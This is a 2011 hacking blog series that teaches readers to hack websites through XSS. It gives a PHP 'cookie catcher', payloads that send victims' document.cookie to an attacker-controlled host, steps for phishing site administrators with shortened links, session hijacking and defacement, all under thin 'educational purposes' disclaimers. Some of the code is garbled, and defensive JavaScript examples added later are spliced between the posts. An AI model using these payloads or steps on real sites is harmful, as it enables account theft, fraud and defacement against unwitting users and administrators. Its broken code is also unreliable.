Monday, November 21, 2011

Splitting the Cookie Catcher Code Line by Line for Understanding

Hello guys, hope you are all fine and enjoying good health. Yesterday I posted about What is Cookie Catcher and How to Get Cookies Using it. It was a simple topic with nothing difficult to understand in it, and we all know it is used in XSS attacks for the purpose of website hacking. Today in this post I am going to split up the code of the cookie catcher line by line to help you understand what this code is actually doing. This tutorial is just for understanding the cookie catcher code and developing a programming approach, so if you don't want to go into the depth of the code, simply skip this topic.

Complete Cookie Catcher Code

  • This is the same code as I have posted in previous tutorial.
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

Splitting the Cookie Catcher Code

Now I am going to split the cookie catcher code line by line and describe what each line of code actually does.
<?php
Write the Code Here
?>
  • These two lines tell the server that the code written between them is PHP code.
  • The first line marks the start of the code and the second marks its end; the code goes between these lines.
$cookie = $_GET['cookie'];
  • This line is the backbone of the cookie catcher code: it gets the cookie from the web browser using PHP's GET statement.
$ip = $_SERVER['REMOTE_ADDR'];
  • REMOTE_ADDR is the user's IP, and with this command we are able to get the IP address of the user as well.
$date=date(“j F, Y, g:i a”);
  • Date is well the date the cookie was taken and all the alphabets are actually the variables where the captured date is stored.
$referer=$_SERVER['HTTP_REFERER'];
  • HTTP_REFERER is the site from which the user clicked your script and had his cookies captured. It is actually the same site where you posted your script.
$fp = fopen('cookies.html' 'a');
  •  This code opens a file named cookies.html on the server where you have uploaded the cookie catcher tool and its the same file where your cookie catcher code will actually come.
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Website: ‘.$referer.’<br><br><br>’);
  • In the previous code we opened a file named cookies.html; now we have to write the captured cookies into it, and this code does exactly that.
  • It writes the Cookie, Date and Time and Website into the opened file cookies.html.
fclose($fp);
  • After writing all the data into cookies.html, this code finally closes the file.
header ("javascript:history.back()");
  • This final line of code sends the user back to the last page from where he clicked on your link.
  • This code is very useful as victim has no idea that his cookies are captured.
That's all for today and if you want to check where and how to use this Cookie Catcher then read Hack Website Using XSS Attack .
NOTE : You may write your own cookie catcher code if you have the basic knowledge of php and again i am mentioning that this tutorial is totally for educational purposes and team of HWS is not responsible for any kind of misuse of this code.

Saturday, November 19, 2011

What is Cookie Catcher and How to Get Cookies Using it

Hello guys, hope you are all enjoying good health. The day before yesterday I completed my tutorial on XSS, in which we covered Hack Websites using XSS Attack and then Hack Website using XSS Attack - Non Persistent Method. In those tutorials I said that we have to use a cookie catcher tool to get the cookies into our online free PHP hosting account. After that I got a lot of questions about the cookie catcher, like what it is, etc.
So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it. Hope you guys like it, and if you have any problem with it, do let me know in the comments.

What is Cookie ?

  • First of all we will see what a cookie is. In simple words, a cookie is a special thing which our web browser uses to store our information, such as usernames, passwords, etc.
  • Have you ever noticed that when we log in to some account like Facebook and click on any page to open it in a new tab, we don't have to enter our username and password again? Even if we close Facebook and open it again, there is still no need to enter our details again unless we log out of the account.
  • This is done by our browser's cookie. It is actually there for our ease, but think what happens if this cookie gets stolen: then someone can easily log in to our account without even knowing the password.
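The script-based theft this page goes on to describe depends on the session cookie being readable through `document.cookie`. The following is an added example, not code from the original post: it models which cookies a page script can read and audits `Set-Cookie` headers for missing protective attributes. The cookie values and the `theme` cookie are constructed; `PHPSESSID` is PHP's default session cookie name.

```javascript
// Builds a Set-Cookie header value for a session cookie (hardened by default).
function sessionCookie(name, value, { httpOnly = true, secure = true, sameSite = 'Lax' } = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`, 'Path=/'];
  if (httpOnly) parts.push('HttpOnly');
  if (secure) parts.push('Secure');
  if (sameSite) parts.push(`SameSite=${sameSite}`);
  return parts.join('; ');
}

// Models document.cookie: only cookies WITHOUT HttpOnly are visible to scripts.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(';').map((s) => s.trim()))
    .filter(([, ...attrs]) => !attrs.some((a) => a.toLowerCase() === 'httponly'))
    .map(([pair]) => pair)
    .join('; ');
}

// Audit helper: reports which protective attributes a Set-Cookie header lacks.
function missingFlags(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const have = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  const missing = ['httponly', 'secure', 'samesite'].filter((f) => !have.has(f));
  return { name: pair.split('=')[0], missing };
}

// Constructed sample responses: a weak site and the same site after hardening.
const WEAK = [
  sessionCookie('PHPSESSID', 'abc123', { httpOnly: false, secure: false, sameSite: null }),
  'theme=dark; Path=/',
];
const HARDENED = [sessionCookie('PHPSESSID', 'abc123'), 'theme=dark; Path=/'];

console.log('weak site exposes:    ', scriptVisibleCookies(WEAK));
console.log('hardened site exposes:', scriptVisibleCookies(HARDENED));
console.log('audit of weak session cookie:', missingFlags(WEAK[0]));
```

With `HttpOnly` set, an injected script still runs, but the session identifier is no longer part of what it can read, so the flag complements output encoding rather than replacing it.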

What is a cookie catcher?

  • A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
  • A hacker usually sends you a code or link, and this link is connected to the cookie catcher.
  • When someone clicks on that link, the cookie catcher works and captures all the cookies of the innocent victim and sends them to the hacker.

Is making a cookie catcher hard ?

  • Now the question arises: is it difficult to make a cookie catcher, as it looks like we have to do some PHP programming, etc.?
  • The answer is no; if you have basic knowledge of PHP, you can make a cookie catcher very easily.
  • In fact, the hard part is to get someone to click on a link which contains your cookie catcher.

How to Make a Cookie Catcher ?

  • Copy the below code in a notepad :
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>
  • Save this notepad as CookieCatcher.php
  • Hurrah !!! You have created a cookie catcher.

 How to Use Cookie Catcher ?

  • Now the question arises how can we use a cookie catcher.
  • First of all create a free account on 0fees.net
  • After creating account open cpanel.0fees.net and log in to your account.
  • Now under File Management , click on Online File Manager .
  • Now open htdocs and upload the CookieCatcher.php file in it.
  • Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.
<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>
  • Make sure to change user username .
  • After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.
NOTE : This tutorial is only for Educational purposes and HWS team is not responsible for any kind of mis use of it .

Thursday, November 17, 2011

Hack Websites using XSS Attack - Non-Persistent Method

Hello guys, hope you are fine. Yesterday we discussed Hack Website using XSS Attack, in which we learned the first type of XSS, i.e. Persistent XSS. Today we will take it a little further: we will cover the second type of XSS and how to hijack a session after XSS. One more thing, guys: don't ask me to personally teach you this stuff, as I don't have much time and it's really hectic, but if you have any problem, raise it in the comments and I will completely satisfy you while answering your problem. So, I think now we should start, so let's start:

Non-Persistent XSS:

In this method we will force our victim to go to our link,initial steps are almost similar to previous method.
  • First of all we will search for a XSS vulnerable site.
  • After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
  • To check this add this simple code in the search box and click the search button.
Code:
<script>alert(document.cookie)</script>
  • After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
  • Now after confirming the vulnerability add the below code in the url of this search.php page.
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
  • Now we have to shrink the link of whole page for this use tinyurl or any other such service.
  • Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
  • After getting the email id send him a fake email from any online fake mailer or through your fake id.
  • In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
  • Tinyurl will mask the link and don't let it to go to spam
  • Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. 
  • No matter what he does and changes his password you can still login as him.
NOTE : Among these two types of XSS , Persistent is used most commonly and is the best way to get cookies.
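From the defending site's side, a reflected attempt like the one above leaves the payload in the web server's access log as part of the request URL. The following is an added example, not part of the original post: it decodes each logged query string (repeatedly, because the value may have been encoded more than once) and flags script tags and cookie or redirect code in it. The log lines, IP addresses and rule names are constructed.

```javascript
// Constructed access-log lines (combined-log style); hosts and paths are made up.
const SAMPLE_LOG = [
  '203.0.113.5 - - [17/Nov/2011:10:01:02 +0000] "GET /search.php?q=blue+widgets HTTP/1.1" 200 512',
  '203.0.113.9 - - [17/Nov/2011:10:02:10 +0000] "GET /search.php?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 640',
  '198.51.100.7 - - [17/Nov/2011:10:05:44 +0000] "GET /search.php?q=%2522%253E%253Cscript%253Edocument.location%253D HTTP/1.1" 200 655',
  '198.51.100.8 - - [17/Nov/2011:10:06:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 300',
];

// Detection rules applied to the decoded query string (names are illustrative).
const RULES = [
  ['script-tag', /<\s*script\b/i],
  ['html-tag', /<\s*(iframe|body)\b/i],
  ['cookie-read', /document\.cookie/i],
  ['redirect', /document\.location/i],
];

// URL-decodes until the value stops changing, so nested encoding is normalised.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { break; } // malformed: keep as is
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Returns one finding per log line whose query string matches any rule.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, i) => {
    const m = line.match(/^(\S+) .*?"(?:GET|POST) (\S+) HTTP/);
    if (!m) return;
    const cut = m[2].indexOf('?');
    const path = cut < 0 ? m[2] : m[2].slice(0, cut);
    const decoded = fullyDecode(cut < 0 ? '' : m[2].slice(cut + 1));
    const hits = RULES.filter(([, re]) => re.test(decoded)).map(([name]) => name);
    if (hits.length) findings.push({ line: i + 1, ip: m[1], path, hits });
  });
  return findings;
}

console.log(scanLog(SAMPLE_LOG));
```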

Session Hijack

Until now we have discussed how to get someone's cookies using XSS; now we will see how these cookies are used to enter the victim's account. This is called Session Hijack.
  • Ok now we have got the admin's cookies using both methods, so we need to edit our own browser's cookies. 
  • First of all go to that site's admin login or its main page whose cookies you have.
  • Now delete ALL of your cookies from that page.For this check the topic on cookies. 
  • Now go in your cookies.html page which you have made on a free hosting site and copy everything in front of the Cookie: in a notepad.These are the cookies. 
  • This sign ; separates cookies from each other so first copy the code before the ;i.e the first cookie.
  • Now come back to that vulnerable site and instead of  link add the following code but don't hit enter:
Code:
Javascript:void(document.cookie="ADD YOUR COOKIE HERE")
  • Add that cookie in between " " and now hit enter.
  • Do this with all of the cookies and refresh the page.
  • And hurrah!!! you are logged in as administrator.
  • So now go in your admin panel and upload your deface page,now you can do anything to that site.
That's all for today,hope you guys like it , I will try to make a video tutorial on it . If you guys have any problem ask in the comments. Have fun .... Take care ..... :))

Wednesday, November 16, 2011

Hack Websites using XSS Attack

I have already posted about How to Hack Website Completely using SQL Injection, and I have also posted a Video Tutorial on it. Today I am going to start on XSS. I know most of the guys don't even know its name, so I am going to start from the very basics to give you the whole concept of it. Hope you guys like it.

Introduction of XSS

  • An XSS attack is used to hack websites online, and it mostly works on those sites which use cookies for storing your username and password when you log in to that site. Check this Wikipedia article to learn what cookies are.
  • XSS usually works on those sites which allow users to add any code in an open place, like starting a new thread in a forum, or which let members send code to other members in messages. It is actually a script / a code which the attacker submits, and whoever clicks on it or even sees it gets affected.
  • The purpose of the attacker or hacker doing XSS is to steal the cookie of a user who is currently logged in on that site and viewing the code submitted by the hacker, so that he can later use that cookie to get into the user's account. (Steal in this context means just getting a copy of the cookie, rather than removing the original cookie.)
For example: User A logs in on a site and user B uses an XSS attack and gets the cookie of user A; now user B can easily get into the account of user A using these cookies ..... :))

Finding a XSS Vulnerable sites:

  • First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
  • To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :
Code:
"><script>alertundefineddocument.cookie)</script>
Code:
'><script>alertundefineddocument.cookie)</script>
Code:
"><script>alertundefined"Test")</script>
Code:
'><script>alertundefined"Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>
  • After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
  • Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site.
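The test strings above only have an effect when the page writes the request parameter back into its HTML without encoding it: the leading `">` closes the attribute and tag the value was placed in. The following is an added example, not code from the original post or from any real site, showing a constructed search template in its vulnerable form next to the output-encoded form, using test strings from this page's list plus a single-quote variant.

```javascript
// Maps each HTML-significant character to its entity.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Vulnerable: the query is pasted straight into an attribute and into the body.
function renderSearchUnsafe(query) {
  return `<input name="q" value="${query}"><p>Results for ${query}</p>`;
}

// Hardened: every reflection of the query is encoded for HTML output.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<input name="q" value="${q}"><p>Results for ${q}</p>`;
}

// Lists tags a browser would parse that the template itself did not emit.
function injectedTags(html) {
  const expected = new Set(['input', 'p', '/p']);
  const tags = html.match(/<\/?[a-zA-Z][^\s>]*/g) || [];
  return tags.map((t) => t.slice(1).toLowerCase()).filter((t) => !expected.has(t));
}

// Test strings from this page's list, plus the single-quote variant of the first.
const PROBES = [
  '"><script>alert(document.cookie)</script>',
  "'><script>alert(document.cookie)</script>",
  '"><body bgcolor="FF0000"></body>',
];

for (const probe of PROBES) {
  console.log('unsafe:', injectedTags(renderSearchUnsafe(probe)));
  console.log('safe:  ', injectedTags(renderSearchSafe(probe)));
}
```

In the hardened output the probe appears as inert text such as `&quot;&gt;&lt;script&gt;`, so no alert box, background change or frame is produced.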

Types of XSS Attack

  • There are two types of mostly used XSS attacks named :
  1. Persistent XSS
  2. Non-Persistent XSS

Persistent XSS:

  • This is the first type of XSS.In this method we will steal the victim's cookies with no suspect on us.
  • So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack.
  • So now lets try to grab it's cookies.
  • First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php .
  • Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:
Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
  • Replace the bold link with the link of your cookie catcher uploaded on free hosting site.
  • Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.
  •  Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php 
  • Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html
  • Now save these cookies as we gonna use them to hijack session of victim.... ;)
That's all for today ,I will post more on it tomorrow in which we will check Non-persistent XSS and also check how to use these cookies to hijack the session of victim .If you have any question till now may ask in comments..... Take care ... :))

Update: I have posted the second part of this tutorial, named Hack Website using XSS Attack - Non Persistent Method.
